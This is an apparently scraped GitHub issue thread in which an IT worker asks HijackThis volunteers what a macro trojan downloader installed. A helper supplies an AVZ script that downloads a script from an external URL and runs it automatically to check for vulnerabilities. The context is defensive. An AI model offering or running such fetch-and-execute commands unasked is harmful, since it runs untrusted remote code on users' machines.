Comments (9)
CollectionLog-2018.11.07-14.02.zip
I know the end user enabled the Macro. Analysing the word document led to a generic VBA/Trojan Downloader. I'm not sure what was actually downloaded and ran.
I'm running the traditional removal tools and scans, but as yet they have not found anything. I'm hoping someone can look at the collection log and provide feedback on what payload the Macro delivered.
from hijackthis.
Hi,
thank you for the log.
We'll return to you as soon as possible.
Please, note that only members of VIRUSNET-Association are allowed to respond in PC cure topics.
Ignore any recommendations given by other users, including PM !!!
Assistance is provided free of charge at our free time. If you found our help useful, you can thank us with any amount using this form or you can leave a feedback in Guestbook.
from hijackthis.
Hello,
What kind of problems are you experience now?
Are these tweaks were applied by yourself?
Blocked: Registry Editor
Internet Explorer - settings blocked
from hijackthis.
Those are Group Policy Restrictions to restrict End User access to prevent students (and teachers) from bypassing the internet filter.
from hijackthis.
Ok, but you didn't answer my first question. :)
from hijackthis.
I choose to reimage the machine before putting it back on the network Friday as I couldn't wait any longer to get the employee back her computer. So I'm not having issues as of now. But I'm still concerned as all the virus scanners and malware scanners found nothing before I imaged the machine. So what did the macro do? I didn't see anything in the hijackthis logs, but maybe I missed something. I'm concerned if it moved laterally on my network. But without any idea what footprint to look for... I'm hoping the logs uploaded to GitHub last Wednesday would give me a clue as to what I'm looking for.
from hijackthis.
Logs didn't show any malicious in system.
You can check the system for vulnerabilities:
Run script in AVZ while Internet is connected:
var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('It is impossible to download AVZ script for finding vulnerability!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
After script ends and if it find vulnerabilities file avz_log.txt will be open in the Notepad and there'll be download links in it.
First of all it depends to browsers, Java, Adobe Acrobat/Reader and Adobe Flash Player.
You should download and install needful programs if they exist in avz_log.txt
Reboot your PC.
Run script again to ensure that all vulnerabilities gone.
from hijackthis.
Thank you for double checking the logs for me. I appreciate the second opinion.
from hijackthis.
If you want we try to analyze that sample you can send us your macros file.
Pack it in zip or rar with password "virus" and send it via email quarantine <at> safezone.cc (replace <at> with @).
from hijackthis.
Related Issues (20)
- Поведение при большом количестве записей в hosts HOT 9
- Не видит часть служб, при этом они существуют HOT 1
- Отсутствующая иконка при свёрнутом HJT и артефакт в интерфейсе HOT 5
- При вызове настроек нет возможности вернуться к списку найденного HOT 2
- Недостаточно информации в списке, предлагаемые пути перехода неоднозначны HOT 3
- Вылетает при ПКМ на Known Folder HOT 1
- Открытие реестра внешними программами HOT 1
- hello HOT 2
- "Sign" characters in log file HOT 3
- Searching for spyware (recently threatened of token grabber) HOT 2
- Ignored items are still reported (since Alpha 3.4.x.x HOT 4
- Need help looking over Hijackthis.log HOT 1
- Need help looking over Hijackthis.log HOT 2
- I think my computer, tv, wifi is being hacked possibly by a neighbor HOT 15
- Problem still exists - Possibly being hacked through router HOT 2
- Hangthis log analysis requuest HOT 17
- hijack this told me to make create a topic HOT 14
- Windows 10 Sleep Mode Malfunction HOT 5
- Firefox and pc acting strange, long load times and loading wheel spinning HOT 11
- My computer seems to use almost 45% of my ram constantly and there is nothing in the task manager HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hijackthis.